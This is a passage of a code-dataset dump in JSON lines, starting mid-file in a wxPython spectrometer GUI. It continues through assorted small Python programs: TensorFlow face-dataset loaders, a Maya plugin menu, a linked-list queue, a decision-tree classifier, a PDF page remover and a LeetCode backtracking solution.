(button.__pause_label__)\n\t\t\t\n\t\telif button.GetLabel() == button.__pause_label__ :\n\t\t\tbutton.__running_manager__.pause(); button.SetLabel (button.__resume_label__)\n\t\t\t\n\t\telif button.GetLabel() == button.__resume_label__ :\n\t\t\tbutton.__running_manager__.resume(); button.SetLabel (button.__pause_label__)\n\t\t\t\n\t\telif button.GetLabel() == button.__stop_label__ :\n\t\t\t# Stop 
timer\n\t\t\tbutton.__scanning_timer__.Stop()\n\t\t\tdel button.__scanning_timer__\n\t\t\t# Stop measurements\n\t\t\tbutton.__running_manager__.stop(); \n\t\t\tdel button.__running_manager__\n\t\t\tbutton.SetLabel (button.__start_label__)\n\t\t\t\n\t\t\ttry : # Start post processing, if present\n\t\t\t\tbutton.__post_process__(button.__results_filename__)\n\t\t\texcept AttributeError : pass\n\t\t\t\n\t\telse : raise ValueError (\"Unrecognised button label\")\n\t\t\n\tdef StopAllJobs (self) :\n\t\t\"\"\"\n\t\tStop all tasks \n\t\t\"\"\"\n\t\tfor control in self.panel.GetChildren() :\n\t\t\ttry :\n\t\t\t\tif isinstance(control, wx.Button) and control.GetLabel() != control.__start_label__ :\n\t\t\t\t\tcontrol.SetLabel (control.__stop_label__)\n\t\t\t\t\tcontrol.GetEventHandler().ProcessEvent(wx.PyCommandEvent(wx.EVT_BUTTON.typeId, control.GetId()))\n\t\t\texcept AttributeError : pass\n\t\t\n\tdef MeasureSingleSpectrum (self, event=None) :\n\t\t\"\"\"\n\t\tButton 'Show spectrum' was clicked\n\t\t\"\"\"\n\t\tbutton = self.show_spectrum_button\n\t\t\n\t\tif button.GetLabel() == button.__start_label__ :\n\t\t\tself.StopAllJobs()\n\t\t\t# get spectrometer's settings\n\t\t\tspect_settings = self.SettingsNotebook.Spectrometer.GetSettings()\n\t\t\t\n\t\t\t# Initiate spectrometer\n\t\t\tif self.Spectrometer.SetSettings(spect_settings) == RETURN_FAIL : return\n\t\t\tself.wavelengths = self.Spectrometer.GetWavelengths()\n\t\t\t\n\t\t\t# Clearing the figure\n\t\t\tvisvis.clf()\n\t\t\n\t\t\tdef draw_spectrum (event) :\n\t\t\t\t\"\"\"Timer function \"\"\"\n\t\t\t\tspectrum = self.Spectrometer.AcquiredData() \n\t\t\t\tif spectrum == RETURN_FAIL : return\n\t\t\t\t# Display the spectrum\n\t\t\t\t\n\t\t\t\t############### Take the log of spectrum ##########\n\t\t\t\t#spectrum = spectrum / float(spectrum.max())\n\t\t\t\t#np.log10(spectrum, out=spectrum)\n\t\t\t\t##############################\n\t\t\t\t\n\t\t\t\tax = visvis.gca()\n\t\t\t\tax.Clear()\t\n\t\t\t\tvisvis.plot (self.wavelengths, spectrum)\n\t\t\t\tvisvis.xlabel(\"wavelength (nm)\")\n\t\t\t\tvisvis.ylabel(\"counts\")\n\t\t\t\t\n\t\t\t\t# Display the current temperature\n\t\t\t\tvisvis.title (\"Temperature %d (C)\" % self.Spectrometer.GetTemperature() )\n\t\t\t\t\n\t\t\t# Set up timer to draw spectrum\n\t\t\tTIMER_ID = wx.NewId()\n\t\t\tself.spectrum_timer =  wx.Timer (self, TIMER_ID)\n\t\t\tself.spectrum_timer.Start (spect_settings[\"exposure_time\"])\n\t\t\t\n\t\t\t# Change button's label\n\t\t\tbutton.SetLabel (button.__stop_label__)\n\t\t\twx.EVT_TIMER (self, TIMER_ID, draw_spectrum)\n\t\t\t\n\t\telif button.GetLabel() == button.__stop_label__ :\n\t\t\t# Stopping timer\n\t\t\tself.spectrum_timer.Stop()\n\t\t\tdel self.spectrum_timer\n\t\t\t# Change button's label\n\t\t\tbutton.SetLabel (button.__start_label__) \n\t\t\t\n\t\telse : raise ValueError(\"Label is not recognized\") \n\t\t\n\tdef SaveSettings (self, event=None, default_filename = \"settings.hdf5\", title=\"Open HDF5 file to save settings\" ) :\n\t\t\"\"\"\n\t\tButton 'Save settings...' was clicked\n\t\t\"\"\"\n\t\topenFileDialog = wx.FileDialog(self, title, \"\", default_filename, \"HDF5 files (*.hdf5)|*.hdf5\", \n\t\t\t\t\t\t\twx.FD_SAVE | wx.FD_OVERWRITE_PROMPT | wx.FD_CHANGE_DIR)\n\t\t# Check whether user cancelled\n\t\tif openFileDialog.ShowModal() == wx.ID_CANCEL: return None\t\n\t\t\n\t\twith h5py.File (openFileDialog.GetPath(), 'w') as file_settings :\n\t\t\t# create general settings \n\t\t\tparameters_grp = file_settings.create_group(\"settings\")\n\t\t\t# Loop over all settings tabs\n\t\t\tfor SettingsTabName, 
SettingsTab in self.SettingsNotebook.settings_to_tabs.items() :\n\t\t\t\t# Save all settings on a given tab\n\t\t\t\tgrp = parameters_grp.create_group(SettingsTabName)\n\t\t\t\tfor key, value in SettingsTab.GetSettings().items() : grp[key] = value\n\t\t\n\t\t# return valid filename\n\t\treturn openFileDialog.GetPath()\n\t\t\n\tdef LoadSettings (self, event) :\n\t\t\"\"\"\n\t\tButton 'Load settings...' was clicked. This method is closely related to SaveSettings.\n\t\t\"\"\"\n\t\topenFileDialog = wx.FileDialog(self, \"Open HDF5 file to load settings\", \"\", \"\",\n                                       \"HDF5 files (*.hdf5)|*.hdf5\", wx.FD_OPEN | wx.FD_FILE_MUST_EXIST | wx.FD_CHANGE_DIR)\n\t\t# Check whether user canceled\n\t\tif openFileDialog.ShowModal() == wx.ID_CANCEL: return\t\n\t\t\n\t\tself.StopAllJobs()\n\t\t\n\t\twith h5py.File (openFileDialog.GetPath(), 'r') as file_settings :\n\t\t\tfor SettingsTabName, SettingsTab in file_settings[\"settings\"].items() :\n\t\t\t\tself.SettingsNotebook.settings_to_tabs[SettingsTabName].SetSettings(SettingsTab)\n\t\t\n\t\t\n#########################################################################\nif __name__ == '__main__' :\n\tmultiprocessing.freeze_support()\n\tapp = visvis.use('wx')\n\tapp.Create()\n\tSurfaceControlExperiment (None)\n\tapp.Run()\n","sub_path":"projetcs/Surface Control/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"577911320","text":"import time\r\nimport webbrowser\r\n\r\nnew = 2\r\nurl = \"https://www.youtube.com/watch?v=Z6qnRS36EgE\"\r\ntotal_breaks = 3\r\nbreak_count = 0\r\n\r\nprint (\"This program started on\" + time.ctime())\r\nwhile (break_count < total_breaks) :\r\n    time.sleep(10)\r\n    webbrowser.open(url, new=new)\r\n    break_count = break_count + 1\r\n","sub_path":"python 실습 코드/1. webbrowser_module/break_time.py","file_name":"break_time.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"184127013","text":"import threading\nimport time\n\ndef job(a):\n    name = threading.current_thread().name\n    print(\"%s: %d\" % (name, a))\n    time.sleep(1)\n\nthreads = []\nfor i in range(5):\n    threads.append(threading.Thread(target=job, args=(i,)))\n\nfor t in threads:\n    t.start()\n","sub_path":"yuanta_python3-master/lesson13/Demo3_append.py","file_name":"Demo3_append.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"33311350","text":"# coding=utf8\nimport maya.cmds as cmds\nimport maya.OpenMaya as om\nimport maya.OpenMayaMPx as OpenMayaMPx\nimport sys\nimport main_func\nreload(main_func)\n\nclass_name = 'render_tool'\n\n\nclass Creat(OpenMayaMPx.MPxCommand):\n    menu_name = 'render tool'\n    cmds.menu(menu_name, label=menu_name, tearOff=True, parent='MayaWindow')\n    command = 'import maya.cmds as cmds;from main_func import window;window()'\n    cmds.menuItem(label='render', command=command)\n\n    def __init__(self):\n        OpenMayaMPx.MPxCommand.__init__(self)\n\n    def doIt(self, argList):\n        pass\n\n\ndef cmdCreator():\n    return OpenMayaMPx.asMPxPtr(Creat())\n\n\ndef initializePlugin(mobject):\n    mplugin = OpenMayaMPx.MFnPlugin(mobject)\n    try:\n        mplugin.registerCommand(class_name, cmdCreator)\n    except:\n        sys.stderr.write('Failed to register command' + class_name)\n\n\ndef uninitializePlugin(mobject):\n    if cmds.menu('render_tool', exists=True):\n        cmds.deleteUI('render_tool', menu=True)\n    mplugin = OpenMayaMPx.MFnPlugin(mobject)\n    try:\n        mplugin.deregisterCommand(class_name)\n    except:\n        sys.stderr.write('Failed to deregister command' + class_name)\n","sub_path":"arnold_renderer/render_plug.py","file_name":"render_plug.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"143427481","text":"import os\nimport glob2\nimport pickle\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\n\n# /datasets/faces_emore_112x112_folders/*/*.jpg'\ndefault_image_names_reg = \"*/*.jpg\"\ndefault_image_classes_rule = lambda path: int(os.path.basename(os.path.dirname(path)))\n\n\ndef pre_process_folder(data_path, image_names_reg=None, image_classes_rule=None):\n    if not os.path.exists(data_path):\n        return np.array([]), np.array([]), 0\n    while data_path.endswith(\"/\"):\n        data_path = data_path[:-1]\n    dest_pickle = os.path.join(\"./\", os.path.basename(data_path) + \"_shuffle.pkl\")\n    if os.path.exists(dest_pickle):\n        with open(dest_pickle, \"rb\") as ff:\n            aa = pickle.load(ff)\n        image_names, image_classes = aa[\"image_names\"], aa[\"image_classes\"]\n    else:\n        if image_names_reg is None or image_classes_rule is None:\n            image_names_reg, image_classes_rule = default_image_names_reg, default_image_classes_rule\n        image_names = glob2.glob(os.path.join(data_path, image_names_reg))\n        image_names = np.random.permutation(image_names).tolist()\n        image_classes = [image_classes_rule(ii) for ii in image_names]\n        with open(dest_pickle, \"wb\") as ff:\n            pickle.dump({\"image_names\": image_names, \"image_classes\": image_classes}, ff)\n    classes = np.max(image_classes) + 1\n    return image_names, image_classes, classes\n\n\ndef read_image(file_path, label, classes=0, one_hot_label=True):\n    if one_hot_label:\n        label = tf.one_hot(label, depth=classes, dtype=tf.int32)\n    img = tf.io.read_file(file_path)\n    img = tf.image.decode_jpeg(img, channels=3)\n    img = tf.image.convert_image_dtype(img, tf.float32)\n    return img, label\n\n\ndef random_process_image(img, label, img_shape=(112, 112), random_status=2, random_crop=None):\n    img = tf.image.random_flip_left_right(img)\n    if random_status >= 1:\n        img = tf.image.random_brightness(img, 0.1 * random_status)\n    if random_status >= 2:\n        img = tf.image.random_contrast(img, 1 - 0.1 * random_status, 1 + 0.1 * random_status)\n        img = tf.image.random_saturation(img, 1 - 0.1 * random_status, 1 + 0.1 * random_status)\n    if random_crop is not None:\n        img = tf.image.random_crop(img, random_crop)\n        img = tf.image.resize(img, img_shape)\n    img = (tf.clip_by_value(img, 0.0, 1.0) - 0.5) * 2\n    return img, label\n\n\ndef prepare_dataset(\n    data_path,\n    image_names_reg=None,\n    image_classes_rule=None,\n    batch_size=128,\n    img_shape=(112, 112),\n    random_status=2,\n    random_crop=None,\n    cache=False,\n    shuffle_buffer_size=None,\n    is_train=True,\n):\n    image_names, image_classes, classes = pre_process_folder(data_path, image_names_reg, image_classes_rule)\n    if len(image_names) == 0:\n        return None, 0\n    print(\">>>> Image length: %d, Image class length: %d, classes: %d\" % (len(image_names), len(image_classes), classes))\n\n    AUTOTUNE = tf.data.experimental.AUTOTUNE\n    ds = tf.data.Dataset.from_tensor_slices((image_names, image_classes))\n    # ds = ds.repeat()\n    ds = ds.shuffle(buffer_size=len(image_names))\n    ds = ds.map(lambda xx, yy: read_image(xx, yy, classes), num_parallel_calls=AUTOTUNE)\n    # ds = ds.prefetch(buffer_size=AUTOTUNE)\n    if cache:\n        ds = ds.cache(cache) if isinstance(cache, str) else ds.cache()\n\n    if is_train:\n        process_func = lambda xx, yy: random_process_image(xx, yy, img_shape, 
random_status, random_crop)\n    else:\n        process_func = lambda xx, yy: ((xx - 0.5) * 2, yy)\n    ds = ds.map(process_func, num_parallel_calls=AUTOTUNE)\n    ds = ds.batch(batch_size)  # Use batch --> map has slightly effect on dataset reading time, but harm the randomness\n    ds = ds.prefetch(buffer_size=AUTOTUNE)\n    # ds = ds.prefetch(buffer_size=1000)\n    # steps_per_epoch = np.ceil(len(image_names) / batch_size)\n    # return ds, steps_per_epoch, classes\n    return ds\n\n\nclass Triplet_dataset:\n    def __init__(\n        self,\n        data_path,\n        image_names_reg=None,\n        image_classes_rule=None,\n        batch_size=48,\n        image_per_class=4,\n        img_shape=(112, 112, 3),\n        random_status=3,\n        random_crop=None,\n    ):\n        self.AUTOTUNE = tf.data.experimental.AUTOTUNE\n        image_names, image_classes, classes = pre_process_folder(data_path, image_names_reg, image_classes_rule)\n        image_dataframe = pd.DataFrame({\"image_names\": image_names, \"image_classes\": image_classes})\n        image_dataframe = image_dataframe.groupby(\"image_classes\").apply(lambda xx: xx.image_names.values)\n        aa = image_dataframe.map(len)\n        self.image_dataframe = image_dataframe[aa > image_per_class]\n        self.split_func = lambda xx: np.array(\n            np.split(np.random.permutation(xx)[: len(xx) // image_per_class * image_per_class], len(xx) // image_per_class)\n        )\n        self.image_per_class = image_per_class\n        self.batch_size = batch_size\n        self.img_shape = img_shape[:2]\n        self.channels = img_shape[2] if len(img_shape) > 2 else 3\n        print(\"The final train_dataset batch will be %s\" % ([batch_size * image_per_class, *self.img_shape, self.channels]))\n\n        self.get_label = lambda xx: tf.cast(tf.strings.to_number(tf.strings.split(xx, os.path.sep)[-2]), tf.int32)\n        self.process_path = lambda img_name: random_process_image(\n            *read_image(img_name, label=self.get_label(img_name), classes=classes), self.img_shape, random_status, random_crop\n        )\n        # image_data = self.image_data_shuffle()\n        # self.steps_per_epoch = np.ceil(image_data.shape[0] / self.batch_size)\n\n        train_dataset = tf.data.Dataset.from_generator(\n            self.image_data_shuffle_gen, output_types=tf.string, output_shapes=(image_per_class,)\n        )\n        # train_dataset = train_dataset.shuffle(total)\n        train_dataset = train_dataset.batch(self.batch_size)\n        train_dataset = train_dataset.map(self.process_batch_path, num_parallel_calls=self.AUTOTUNE)\n        self.train_dataset = train_dataset.prefetch(buffer_size=self.AUTOTUNE)\n        self.classes = classes\n\n    def image_data_shuffle_gen(self):\n        tf.print(\"Shuffle image data...\")\n        shuffle_dataset = self.image_dataframe.map(self.split_func)\n        image_data = np.random.permutation(np.vstack(shuffle_dataset.values))\n        return (ii for ii in image_data)\n\n    def process_batch_path(self, image_name_batch):\n        image_names = tf.reshape(image_name_batch, [-1])\n        if \"-dev\" in tf.__version__:\n            images, labels = tf.map_fn(self.process_path, image_names, fn_output_signature=(tf.float32, tf.int32))\n        else:\n            images, labels = tf.map_fn(self.process_path, image_names, dtype=(tf.float32, tf.int32))\n\n        return images, 
labels\n","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":6768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"396175748","text":"from visual import arrow, color, rate, display\r\n\r\nimport recursos.Configuracion as Conf\r\nfrom recursos.Arduino     import Arduino\r\nfrom recursos.Figuras     import Avion, Ejes\r\nfrom recursos.Matematicas import DCM\r\n\r\n# VENTANA ----------------------------------------------------------\r\nventana = display(title='TITULO', x=0, y=0, width=1250, height=1040, center=(0, 0, 0), background=color.black)\r\nventana.forward = (-2, -2, -2)\r\nventana.up = (0, 0, 2)\r\n\r\n# EJES -------------------------------------------------------------\r\nejesFijos = Ejes(color.red, color.green, color.blue)\r\n\r\narduino = Arduino(Conf.PUERTO, Conf.BAUDRATE)\r\narduino.conectar()\r\n\r\navion = Avion()\r\navion.size(4)\r\n\r\ndcm = DCM()\r\n    \r\nwhile 1:\r\n    \r\n    rate(100)\r\n    \r\n    data = arduino.getData(Conf.COD_DCM)\r\n    dcm.update(data)\r\n   \r\n    avion.axis(dcm.iG)\r\n    avion.up(dcm.kG)\r\n        \r\n","sub_path":"RealidadVirtual/src/v02_Avion/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"469964605","text":"'''\nClass that contains all solver variables\n'''\n\nclass Variables(object):\n    '''\n    indictator_routes[route, time] = {0, 1}\n    indicator_product[product, start, end, time] = {0, 1}\n    depot_volume[depot, time] = [0, \\infty)\n    location_incoming[location, time] = [0, \\infty)\n    location_outgoing[location, time] = [0, \\infty)\n    depot_overcap[depot, time] = {0, 1}\n    stoppage = {0, 1}\n    '''\n    def __init__(self):\n        self.indicator_routes = {}\n        self.indicator_product = {}\n        self.depot_volume = {}\n        self.location_incoming = {}\n        self.location_outgoing = {}\n        self.depot_overcap = {}\n        self.stoppage = 0\n        self.location_location_transfer = {}\n","sub_path":"objects/variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"102459290","text":"from .. import udB\n\n\ndef str_to_list(text):  # Returns List\n    return text.split(\" \")\n\n\ndef list_to_str(list):  # Returns String\n    str = \"\"\n    for x in list:\n        str += f\"{x} \"\n    return str.strip()\n\n\ndef get_logger():  # Returns List\n    pmperm = udB.get(\"LOGUSERS\")\n    if pmperm is None or pmperm == \"\":\n        return [\"\"]\n    else:\n        return str_to_list(pmperm)\n\n\ndef is_logger(id):  # Take int or str with numbers only , Returns Boolean\n    if not str(id).isdigit():\n        return False\n    pmperm = get_logger()\n    if str(id) in pmperm:\n        return True\n    else:\n        return False\n\n\ndef log_user(id):  # Take int or str with numbers only , Returns Boolean\n    id = str(id)\n    if not id.isdigit():\n        return False\n    try:\n        pmperm = get_logger()\n        pmperm.append(id)\n        udB.set(\"LOGUSERS\", list_to_str(pmperm))\n        return True\n    except Exception as e:\n        print(f\"King-Userbot LOG : // functions/logusers_db/log_user : {e}\")\n        return False\n\n\ndef nolog_user(id):  # Take int or str with numbers only , Returns Boolean\n    id = str(id)\n    if not id.isdigit():\n        return False\n    try:\n        pmperm = get_logger()\n        pmperm.remove(id)\n        udB.set(\"LOGUSERS\", list_to_str(pmperm))\n        return True\n    except Exception as e:\n        print(f\"King-Userbot LOG : // functions/loguser_db/nolog_user : {e}\")\n        return False\n","sub_path":"pyking/functions/logusers_db.py","file_name":"logusers_db.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"243423935","text":"import imageio\nimageio.plugins.ffmpeg.download()\n\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport math, os\nfrom user_functions_P1 import *\n\nfolder = '../test_images'\noutputfolder = folder + '/output'\ntest_images = []\ntest_images += [each for each in os.listdir(folder) if each.endswith('.jpg') and not each.startswith('.')]\n\n\nfor test_image in test_images:\n\n    test_image_name = os.path.splitext(test_image)\n\n    img = mpimg.imread(folder+'/'+test_image)\n    img_output = process_img_p(img)\n\n    plt.figure\n    plt.imshow(img_output)\n\n    #plt.show()\n    mpimg.imsave(outputfolder + '/' + test_image_name[0] + '_out.jpg', img_output, cmap='gray')","sub_path":"codes/analyse_test_images.py","file_name":"analyse_test_images.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"505111209","text":"print (\"Pig Latin Translator\")\r\n\r\n\r\npig = \"ay\"\r\n\r\noriginal = input(\"Enter a word:\")\r\n\r\nif len(original) > 0 and original.isalpha():\r\n    word = original.lower()\r\n    first = original[0]\r\n    new_word = word + first + pig\r\n    new_word = new_word[1:]\r\n    print(new_word)\r\nelse:\r\n    print (\"empty\")\r\n","sub_path":"PigLatin.py","file_name":"PigLatin.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"205280915","text":"\nfrom random import randint\nclass Node():\n    def __init__(self, value=None):\n        self.value= value\n        self.next= None\n    def __str__(self):\n        return str(self.value)\n\nclass QueueLL():\n    def __init__(self,  values=None):\n        self.head=None\n        self.tail=None\n        \n    def __iter__(self):\n        currNode= self.head\n        while currNode:\n            yield currNode\n            currNode= currNode.next\n\n    def __str__(self):\n        values= [str(x.value) for x in self]\n        return \"\\n____\\n\".join(values)\n\n    def len_ll(self):\n        len_ll=0\n        currNode= self.head\n        while currNode:\n            len_ll+=1\n            currNode= currNode.next\n        return len_ll\n\n    def generate(self, n, max_no, min_no):\n        self.head= None\n        self.tail= None\n        for i in range(n):\n            self.add(randint(min_no, max_no))\n        return self\n\n    def isEmpty(self):\n        return self.head== None\n\n    def enq(self, value):\n        newNode= Node(value)\n        if self.head == None:\n            self.head, self.tail = newNode, newNode\n        self.tail.next= newNode\n        self.tail= newNode\n        return\n\n    def deQ(self):\n        if self.isEmpty(): return \"empty Q\"\n        else:\n            head= self.head\n            self.head= self.head.next\n            return head\n\n    def peek(self):\n        if self.isEmpty(): \"stack is empty\"\n        else: return self.head.value\n\n    def delete(self):\n        self.head= None\n \nll= QueueLL(10)\nll.enq(1)\nll.enq(2)\nll.enq(3)\nll.enq(4)\nprint(ll)\nll.deQ()\nprint(\"after deQing\",ll)","sub_path":"stack_Queue/queue_ll.py","file_name":"queue_ll.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"600562568","text":"import numpy as np\r\nimport pandas as pd\r\n\r\n\r\ndf = pd.read_csv(\"bill_authentication.csv\")\r\n\"\"\"\r\nprint(df)\r\nprint(df.shape)\r\nprint(df.size)\r\nprint(df.columns)\r\nprint(df.info())\r\nprint(df.head())\r\n\"\"\"\r\n\r\n\r\nX = df.iloc[:,:4].values\r\nY = df.iloc[:,4].values\r\n\r\n\"\"\"\r\nprint(X)\r\nprint(Y)\r\nprint(type(X))\r\nprint(type(Y))\r\nprint(X.shape)\r\nprint(Y.shape)\r\n\"\"\"\r\nfrom collections import  Counter\r\nprint(Counter(Y))\r\nprint(np.unique(Y))\r\nprint(df['Class'].value_counts())\r\n\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nX_train,X_test,Y_train,Y_test = train_test_split(X,Y,test_size = 0.2,random_state=65)\r\n\r\n\"\"\"\r\nprint(X_train)\r\nprint(X_test)\r\nprint(Y_train)\r\nprint(Y_test)\r\nprint(X_train.size)\r\nprint(X_train.shape)\r\nprint(Y_train.size)\r\nprint(Y_train.shape)\r\nprint(X_test.size)\r\nprint(X_test.shape)\r\nprint(Y_test.size)\r\nprint(Y_test.shape)\r\n\"\"\"\r\n\r\nfrom sklearn.preprocessing  import StandardScaler\r\nscaler = StandardScaler()\r\nX_train = scaler.fit_transform(X_train)\r\nX_test = scaler.transform(X_test)\r\n\r\n\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nmodel = DecisionTreeClassifier(criterion='entropy')\r\nprint(model.fit(X_train,Y_train))\r\n\r\n\r\n\r\n#Testing predictions\r\nypred = model.predict(X_test)\r\nprint(ypred)\r\n\r\ncompare = pd.DataFrame({'Actual':Y_test,'Predict':ypred})\r\nprint(compare)\r\n\r\n\r\nfrom sklearn.metrics import confusion_matrix\r\nprint(confusion_matrix(Y_test,ypred))\r\n\r\n\r\nfrom sklearn.metrics import classification_report\r\nprint(classification_report(Y_test,ypred))\r\n\r\n\r\nfrom sklearn.metrics import accuracy_score\r\nprint(\"Accuracy Score : \",accuracy_score(Y_test,ypred))\r\n\r\n\r\nprint(df.head(2))\r\n#Dynamically Testing\r\nn1 = float(input(\"Enter a Variance no :\"))\r\nn2 = float(input(\"Enter a skewness no :\"))\r\nn3 = float(input(\"Enter a curtosis no :\"))\r\nn4 = float(input(\"Enter a Entropy no :\"))\r\n\r\n\r\ninputs = scaler.transform([[n1,n2,n3,n4]])\r\nresult = model.predict(inputs)\r\nprint(result)","sub_path":"decision.py","file_name":"decision.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"439751979","text":"import networkx as nx\nimport matplotlib.pyplot as plt\n\ng = nx.Graph()\ng.add_edges_from([(1,2), (2,3), (2,4), (3,4)])\n\nd = nx.degree(g)\n\nnx.draw(g, nodelist=d.keys(), node_size=[v * 100 for v in d.values()])\nplt.show()\n","sub_path":"dmtwitter/lib/testenx.py","file_name":"testenx.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"34885689","text":"from __future__ import print_function # must be first in file\nimport random\n\ndef food_id(food):\n    ''' Returns categorization of food\n\n    food is a string\n    returns a string of categories\n    '''\n    # The data\n    fruits = ['apple', 'banana', 'orange']\n    citrus = ['orange']\n    starchy = ['banana', 'potato']\n\n    # Check the category and report\n    if food in fruits:\n        if food in citrus:\n            return 'Citrus, Fruit'\n        else:\n            return 'NOT Citrus, Fruit'\n    else:\n        if food in starchy:\n            return 'Starchy, NOT Fruit'\n        else:\n            return 'NOT Starchy, NOT Fruit'\n\ndef food_id_test():\n    ''' Unit test for food_id\n        returns True if good, returns False and prints error if not\n        good\n        '''\n    works = True\n    if food_id('orange') != 'Citrus, Fruit':\n        works = False\n        print('orange bug in food id()')\n\n    if food_id('banana') != 'NOT Citrus, Fruit':\n        works = False\n        print('banana bug in food_id()')\n        # Add tests so that all lines of code are visited during test\n\n    if food_id('potato') != 'Starchy, NOT Fruit':\n        works = False\n        print(\"potato bug found in food_id()\")\n\n    if food_id('carrot') != 'NOT Starchy, NOT Fruit':\n        works = False\n        print(\"carrot bug found in food_id()\")\n\n    if works:\n        print('food_id passed all tests')\n        return works\n\n#PLTW told us to make a function 'f(x)' but its flowchart refers to the variable being tested as 'n'.\n#I am going to choose to interpret that as the following code.\ndef f(x):\n    if int(x) == x:\n        if x % 2 == 0:\n            if x % 3 == 0:\n                print(\"x is a multiple of 6\")\n            else:\n                print(\"x is even\")\n        else:\n            print(\"x is odd\")\n\n    else:\n        print(\"x is not an integer\")\n\ndef guess_once():\n    secret = random.randint(1, 4)\n    print('I have a number between 1 and 4.')\n    guess = int(input('Guess: '))\n    if guess < secret:\n        print(\"Too low - my number was\", secret, '!')\n    elif guess > secret:\n        print(\"Too high - my number was\", secret, '!')\n    else:\n        print('Right, my number is', guess, '!')\n\ndef quiz_decimal(low, high):\n    userInput = float(input(\"Type a number between \" + str(low) + \" and \" + str(high)))\n\n    if userInput > high:\n        print(\"No, \", userInput, \"is too high!\")\n    elif userInput < low:\n        print(\"No,\", userInput, \"is too low!\")\n    else:\n        print(\"Good!\", low, '<', userInput, '<', high)\n","sub_path":"CSP/1_3_4/1_3_4.py","file_name":"1_3_4.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"394460978","text":"from PyPDF2 import PdfFileWriter, PdfFileReader\nprint('test')\npages_to_delete = [0] # page numbering starts from 0\ninfile = PdfFileReader('2.File.pdf', 'rb')\noutput = PdfFileWriter()\n\nfor i in range(infile.getNumPages()):\n    if i not in pages_to_delete:\n        p = infile.getPage(i)\n        output.addPage(p)\n\nwith open('newfile.pdf', 'wb') as f:\n    output.write(f)","sub_path":"DeletePage.py","file_name":"DeletePage.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"549539426","text":"\"\"\"\nDate:16/04/2021\n1125. Smallest Sufficient Team - Leetcode Hard\n\nThe following problem is solved using Sets and backtracking\n\"\"\"\nclass Solution:\n    def smallestSufficientTeam(self, req_skills: List[str], people: List[List[str]]) -> List[int]:\n        \n        for i in range(len(people)):\n            people[i]=set(people[i])\n        \n        for i in range(len(people)):\n            for j in range(len(people)):\n                if i!=j and people[i].issubset(people[j]):\n                    people[i]=set()\n        \n        skill_to_person={}\n        \n        for i in range(len(people)):\n            for skill in people[i]:\n                if skill not in skill_to_person:\n                    skill_to_person[skill]=set()\n                skill_to_person[skill].add(i)\n                \n        \n        \n        unmet_skills=set(req_skills)\n        Best_Team=[]\n        Team=[]\n        Min_Team=100000000\n        def meet_skill(skill=0):\n            nonlocal unmet_skills,Best_Team,Team,Min_Team\n            if not unmet_skills:\n                if Min_Team>len(Team):\n                    Best_Team=Team[::]\n                    Min_Team=len(Team)\n                return\n            \n            if req_skills[skill] not in unmet_skills:\n                meet_skill(skill+1)\n                return\n            \n            for person in skill_to_person[req_skills[skill]]:\n                \n                skill_to_add=unmet_skills.intersection(people[person])\n                unmet_skills-=skill_to_add\n                Team.append(person)\n                meet_skill(skill+1)\n                Team.pop()\n                unmet_skills=unmet_skills.union(skill_to_add)\n                \n                    \n    \n        \n        meet_skill()\n        return Best_Team\n        \n        \n        \n        \n        ","sub_path":"Hashing/Smallest_Sufficient_Team.py","file_name":"Smallest_Sufficient_Team.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
